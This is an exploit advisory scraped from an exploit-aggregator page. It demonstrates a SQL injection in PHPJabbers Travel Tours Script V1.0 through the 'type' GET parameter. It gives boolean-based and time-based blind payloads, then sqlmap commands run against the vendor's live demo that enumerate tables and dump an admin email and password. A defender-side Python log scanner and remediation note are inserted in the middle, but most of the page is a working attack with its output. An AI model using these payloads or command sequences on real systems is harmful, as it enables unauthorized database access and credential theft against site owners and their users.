## https://sploitus.com/exploit?id=PACKETSTORM:167756
C r a C k E r  
T H E C R A C K O F E T E R N A L M I G H T  
  
From The Ashes and Dust Rises An Unimaginable crack....  
  
[ Exploits ]  
  
Author : CraCkEr  
Website : phpjabbers.com  
Vendor : PHPJABBERS  
Software : Travel Tours Script V1.0  
Vuln Type: Remote SQL Injection  
Method : GET  
Critical : High  
Impact : Database Access  
  
Travel Tours Script: A content management solution for travel agencies and tour operators  
  
B4nks-NET irc.b4nks.tk #unix  
  
Release Notes:  
Typically used for remotely exploitable vulnerabilities that can lead to system compromise.  
  
Exploit URLs  
  
Live Demo Site:  
  
https://www.phpjabbers.com/travel-tours-script/#sectionDemo  
  
POC:  
  
https://demo.phpjabbers.com/1657840896_841/front.php?controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1'[Injection]  
GET parameter 'type' is vulnerable  
  
---  
Parameter: type (GET)  
Type: boolean-based blind  
Title: AND boolean-based blind - WHERE or HAVING clause  
Payload: controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1) AND 8667=8667 AND (4844=4844  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1) AND (SELECT 7164 FROM (SELECT(SLEEP(5)))loCg) AND (7206=7206  
---  
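
A defender-side check for the two payload shapes listed above, added here as an example and not part of the original advisory: it scans access-log lines and flags any request whose `type` parameter is not a plain integer, labelling the boolean-based and time-based patterns. The log lines, client addresses and function names are constructed for illustration, and the combined log format is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache combined log format (not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [15/Jul/2022:10:00:01 +0000] "GET /front.php?controller=pjListings'
    '&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [15/Jul/2022:10:00:05 +0000] "GET /front.php?controller=pjListings'
    '&action=pjActionListings&type=1%29%20AND%208667%3D8667%20AND%20%284844%3D4844 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [15/Jul/2022:10:00:09 +0000] "GET /front.php?controller=pjListings'
    '&action=pjActionListings&type=1)+AND+(SELECT+7164+FROM+(SELECT(SLEEP(5)))loCg)+AND+(7206=7206 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')
TIME_FUNCS = re.compile(r'\b(?:sleep|benchmark)\s*\(', re.I)
# AND/OR followed by N=N with the same number on both sides.
TAUTOLOGY = re.compile(r'\b(?:and|or)\b\s*\(?\s*(\d+)\s*=\s*\1\b', re.I)

def classify_type(value):
    """Return None for a plain integer, otherwise a label for the anomaly."""
    if re.fullmatch(r'\d{1,10}', value):
        return None
    if TIME_FUNCS.search(value):
        return "time-based"
    if TAUTOLOGY.search(value):
        return "boolean-based"
    return "non-numeric"

def scan(lines, param="type"):
    """Yield (client, label, decoded value) for each suspicious request."""
    findings = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        # parse_qs URL-decodes values, so encoded and raw payloads look alike.
        query = parse_qs(urlsplit(target).query, keep_blank_values=True)
        for value in query.get(param, []):
            label = classify_type(value)
            if label:
                findings.append((client, label, value))
    return findings

if __name__ == "__main__":
    for client, label, value in scan(SAMPLE_LOG):
        print(f"{client}\t{label}\t{value!r}")
```

The check keys on the parameter value rather than the User-Agent, because the sqlmap runs shown on this page use `--random-agent`. The same integer-only rule, enforced server-side together with a bound query parameter, is what removes the injection.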
  
[+] Starting the Attack  
  
  
sqlmap.py -u "https://demo.phpjabbers.com/1657840896_841/front.php?controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1" --current-db --batch --random-agent --no-cast  
  
the back-end DBMS is MySQL  
web server operating system: Linux CentOS 6  
web application technology: Apache 2.2.15  
back-end DBMS: MySQL >= 5.0.12  
[INFO] fetching current database  
current database: 'pjabbers_demo_vpl'  
  
  
sqlmap.py -u "https://demo.phpjabbers.com/1657840896_841/front.php?controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1" -D pjabbers_demo_vpl --tables --batch --random-agent --no-cast  
  
  
[INFO] fetching tables for database: 'pjabbers_demo_vpl'  
[INFO] fetching number of tables for database 'pjabbers_demo_vpl'  
[INFO] resumed: 52  
  
+------------------------------------------+  
| vacationpackages_comments |  
| vacationpackages_countries |  
| vacationpackages_enquiries |  
| vacationpackages_features |  
| vacationpackages_fields |  
| vacationpackages_listings_availabilities |  
| vacationpackages_listings_features |  
| vacationpackages_listings |  
| vacationpackages_multi_lang |  
| vacationpackages_notifications |  
| vacationpackages_options |  
| vacationpackages_payments |  
| vacationpackages_periods |  
| vacationpackages_plugin_country |  
| vacationpackages_plugin_galleries_set |  
| vacationpackages_plugin_gallery |  
| vacationpackages_plugin_locale_languages |  
| vacationpackages_plugin_locale |  
| vacationpackages_plugin_log_config |  
| vacationpackages_plugin_log |  
| vacationpackages_plugin_one_admin |  
| vacationpackages_plugin_paypal |  
| vacationpackages_prices |  
| vacationpackages_roles |  
| vacationpackages_types |  
| vacationpackages_users |  
| vacationpackages_comments |  
| vacationpackages_countries |  
| vacationpackages_enquiries |  
| vacationpackages_features |  
| vacationpackages_fields |  
| vacationpackages_listings |  
| vacationpackages_listings_availabilities |  
| vacationpackages_listings_features |  
| vacationpackages_multi_lang |  
| vacationpackages_notifications |  
| vacationpackages_options |  
| vacationpackages_payments |  
| vacationpackages_periods |  
| vacationpackages_plugin_country |  
| vacationpackages_plugin_galleries_set |  
| vacationpackages_plugin_gallery |  
| vacationpackages_plugin_locale |  
| vacationpackages_plugin_locale_languages |  
| vacationpackages_plugin_log |  
| vacationpackages_plugin_log_config |  
| vacationpackages_plugin_one_admin |  
| vacationpackages_plugin_paypal |  
| vacationpackages_prices |  
| vacationpackages_roles |  
| vacationpackages_types |  
| vacationpackages_users |  
+------------------------------------------+  
  
  
sqlmap.py -u "https://demo.phpjabbers.com/1657905972_980/front.php?controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1" -D pjabbers_demo_vpl -T vacationpackages_users --columns --batch --random-agent --threads 5 --no-cast  
  
[INFO] fetching columns for table 'vacationpackages_users' in database 'pjabbers_demo_vpl'  
Database: pjabbers_demo_vpl  
Table: vacationpackages_users  
[16 columns]  
  
+----------------+--------------------------------------------------------+  
| Column | Type |  
+----------------+--------------------------------------------------------+  
| contact_fax | varchar(255) |  
| contact_mobile | varchar(255) |  
| contact_phone | varchar(255) |  
| contact_title | enum('mr','mrs','miss','ms','dr','prof','rev','other') |  
| contact_url | varchar(255) |  
| created | datetime |  
| email | varchar(255) |  
| id | int(10) unsigned |  
| ip | varchar(15) |  
| is_active | enum('T','F') |  
| last_login | datetime |  
| name | varchar(255) |  
| password | blob |  
| phone | varchar(255) |  
| role_id | int(10) unsigned |  
| status | enum('T','F') |  
+----------------+--------------------------------------------------------+  
  
  
sqlmap.py -u "https://demo.phpjabbers.com/1657905972_980/front.php?controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1" -D pjabbers_demo_vpl -T vacationpackages_users -C email,password --dump --batch --random-agent --threads 5 --no-cast  
  
[INFO] fetching number of column(s) 'email,password' entries for table 'vacationpackages_users' in database 'pjabbers_demo_vpl'  
Database: pjabbers_demo_vpl  
Table: vacationpackages_users  
[1 entry]  
  
+-----------------+------------------------+  
| email | password |  
+-----------------+------------------------+  
|admin@admin.com | P@S13rd |  
+-----------------+------------------------+  
  
[-] Done  
  
  
  
Greets:  
The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL  
CryptoJob (Twitter) twitter.com/CryptozJob  
© CraCkEr 2022